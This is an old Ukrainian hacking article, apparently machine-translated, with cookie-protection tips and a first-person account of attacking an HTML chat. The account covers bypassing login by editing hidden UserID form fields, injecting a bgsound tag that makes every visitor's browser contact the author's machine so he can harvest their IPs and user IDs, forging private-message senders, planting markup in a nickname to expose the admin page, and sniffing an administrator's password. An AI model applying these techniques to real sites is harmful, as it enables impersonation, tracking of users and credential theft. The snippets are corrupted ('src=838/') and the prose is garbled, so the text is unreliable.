» Захист
Nokia N8 WhiteСпособів захисту трохи й кожен спосіб досить незручний.
1. Скасувати використання cookie у броузере.
Недолік у тім, що користувач фактично відмовляється ходити на величезну кількість сайтів.
2. Завести програму із класу Cookie Manager.
Недолік у тім, що треба постійно тримати зайву програму. А це для интернетчика із включеним Firewall’ом, антивірусним монітором, ICQ, Dialer’ом і т.д. досить велика незручність.
3. Не вступати у випадкові зв’язки.
Недолік у тім, що твої “перевірені” друзі теж можуть над тобою подшутить, та й не вступати у випадкові зв’язки - значить сидіти будинку й насолоджуватися сайтами за адресою 127.0.0.1. :)))
Про зломи html-чатов
Автор: Maveric Сайт: http://www.emanual.ru/
Я припускаю, що читач знає, що таке CGI, і на цьому побудую своє пояснення.
Почав я з малого.
У будь-якому чате фрейм, у якому ти пишеш повідомлення, генерится динамічно (для кожного вхідні) і, можливо, містить кілька схованих полів. Типу <input type=hidden name=cookie value=SP202134> (так у партизанах зберігається UserID)
Ідея в наступному: зберігаємо вміст цього фрейму на диску й виправляємо його так, що б можна було з ним працювати зі свого гвинта. Т.е. заміняємо посилання типу /cgi-bin/refresh.pl на повний шлях www.chat.nsk.su/cgi-bin/refresh.pl і замість схованих полів форми пишемо типу <input type=text name=cookie value=SP202134> (що б можна було їх змінювати) Після цього робимо HTML документ для “зборки чата” зі шматків. Т.е. приблизно так
“First.htm”
<html>
<frameset rows=”80%,20%”>
<frameset cols=”70%,30%”>
<frame name=”razg” src=838/refresh.cgi?win+razgovor+nocookie#end”>
<frame name=”rigt” src=838/right.html”>
</frameset>
<frame name=”bot” src=838/”start.htm”>
</frameset>
</html>
Start.htm - це і є той фрейм який я зберіг і змінив
Після цього я просто броузером відкривав цю сторінку (First.htm). І відразу(!!!) попадав у чат, минаючи стандартну процедуру входу. Це дозволило :
1. Обходити зареєстровані імена
2. Ховати свій IP від киллеров, за рахунок узяття чужого ID’a
Далі мені стало цікаво обчислити IP учасників. Я виявив, що не заборонено тэг <bgsound src=838/”">. Це дозволило вставляти у своє повідомлення ресурс зі своєї машини. Сам по собі звук на хер не потрібний, але цей косяк дозволив вставити у свій мес рядок типу <bgsound src=838/spy.exe”>. Цей скрипт (spy.exe) викликався з машини КОЖНОГО учасника чата. Це дозволило побачити IP усіх (скрипт просто зберігав мені на гвинт дані зі змінної оточення REMOTE_ADDR). Це мені не дуже сподобалося, тк не зрозуміло було де чий IP. Приблизно в это-жі час у чате з’явилися приваты. Це значить, що документ у головному фреймі (той де меси все) став називатися по іншому.
До приватов :
http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor#end
Після появи приватов :
http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+SP345678#end
Де SP456789 - UserID
Після цього в скрипт (spy.exe) був доданий висновок ID’a зі змінної оточення HTTP_REFERER Ну а зіставити никнув з ID’ом не проблемма, тк ID кожного прописаний там же приблизно в такому рядку
<br><b><font color=yellow size=-1>Отут никнув</font></b>
<font color=black><a href=”/cgi-bin/private_form.cgi?SP448188″>
<img src=838/mes.gif border=0 vspace=0></a></font>
(Це рядок узятий із правого фрейму, де можна викликати функцію “Хто в чате”)
Після цього перестало бути проблемою зіставлення ника й IP. Потім я вирішив побавитися із приватами.
Використовуючи метод збереження сторінки на гвинт (описаний вище), я одержав форму для відправлення приватов від КОГОСЬ КОМУСЬ. Т.е. я зміг у повідомленні, що приватно відсилає, проставляти ім’я відправника.
Залишилося тільки одне. Я знав, що в чате є киллеры, але нічого не знав про те, що це, де це, як це. Знав тільки, що для того, щоб киллерствовать треба зайти на якусь сторінку. Очевидно, що в цієї киллерской сторінці показуються імена. Я припустив, що моє ім’я показуються таким, яким я його ввожу. Виходячи із цього, я під ім’ям <bgsound src=838/spy.exe”> MyNick зайшов у чат (через прокси), і почав легонько лаятися (мені треба було, щоб киллеры зайшли на свою сторінку). Після цього (коли мене вбили) я розгріб балку мого Вебсервера (OmniHTTPd beta) і побачив там обіг зі страници не стосовної до відомим мені сторінкам чата. Я поліз на цю сторінку й одержав запит на уведення пароля, зі словами “Дорогий адміністратор…”. Це приємно зігріло душу. Далі я почав думати, чи то підібрати пароль, чи те ще що придумати. Але ситуація так зложилася, що я виявився в одній мережі з киллером, і, запустивши сниффер, я поимел пароль.
Ну от і все.
With best regards, Maveric.
P.S. Жоден із цих приколовши вже не працює в партизанах, тому що це був “дружній злом” і про усім, що я знайшов, я розповів творцеві чата. Він всі косяки виправив.